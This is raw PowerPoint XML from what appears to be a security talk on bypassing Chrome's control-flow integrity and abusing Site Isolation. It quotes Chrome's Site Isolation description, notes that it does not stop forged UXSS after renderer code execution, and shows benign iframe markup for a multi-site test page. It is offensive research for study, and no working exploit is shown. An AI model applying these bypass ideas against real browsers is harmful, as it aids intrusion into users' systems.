              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>endp</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1600" kern="100" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279917" y="1825625"/>
            <a:ext cx="5617029" cy="4855093"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Why did this happen?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Probably because of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tagged Pointers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The CFI implementation doesn’t know how to handle Tagged Pointers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Or perhaps this part of the code was hand-coded in assembly…?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6512768" y="2892490"/>
            <a:ext cx="1642187" cy="233265"/>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Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6512768" y="3641536"/>
            <a:ext cx="2845836" cy="233265"/>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686425372"/>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Bypassing CFI be like…</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>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p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3517212536"/>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016621" y="2269866"/>
            <a:ext cx="5175380" cy="2698926"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Abusing Chrome’s Site Isolation</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227" y="1481722"/>
            <a:ext cx="6631394" cy="3939364"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4038154870"/>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Site Isolation</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4743126"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Protects against CPU side channel attacks and UXSS logic bugs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Doesn’t protect against forging a UXSS after gaining RCE in renderer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053192" y="1499894"/>
            <a:ext cx="10091057" cy="3754874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="accent3">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Site Isolation has been enabled by default in Chrome 67 on Windows, Mac, Linux, and Chrome OS to help to mitigate attacks that are able to read otherwise inaccessible data within a process, such as speculative side-channel attack techniques like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spectre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/Meltdown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>. Site Isolation reduces the amount of valuable cross-site information in a web page’s process, and thus helps limit what an attacker could access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>In addition, Site Isolation also offers more protection against a certain type of web browser security bug, called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>universal cross-site scripting (UXSS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>. Security bugs of this form would normally let an attacker bypass the Same Origin Policy within the renderer process, though they don’t give the attacker complete control over the process. Site Isolation can help protect sites even when some forms of these UXSS bugs occur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>There is additional work underway to let Site Isolation offer protection against even more severe security bugs, where a malicious web page gains complete control over its process (also known as “arbitrary code execution”). These protections are not yet fully in place</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2502799861"/>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Site Isolation</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053192" y="1565213"/>
            <a:ext cx="10091057" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="accent3">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Site Isolation offers a second line of defense to make such attacks less likely to succeed. It ensures that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pages from different websites are always put into different processes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, each running in a sandbox that limits what the process is allowed to do</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="2808509"/>
            <a:ext cx="12192000" cy="4049491"/>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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="298580" y="2939130"/>
            <a:ext cx="11579289" cy="3853556"/>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rgbClr val="5B5B5B"/>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rgbClr val="5B5B5B"/>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rgbClr val="5B5B5B"/>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rgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>h1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>This is the parent Frame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>h1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"http://externalist1.com:8080/innocent.html"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>width</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>height</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&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"http://externalist2.com:8080/innocent.html"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>width</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>height</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&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"http://externalist3.com:8080/innocent.html"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>width</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>height</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&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"http://externalist4.com:8080/innocent.html"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>width</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>height</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&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"http://externalist5.com:8080/innocent.html"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>width</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
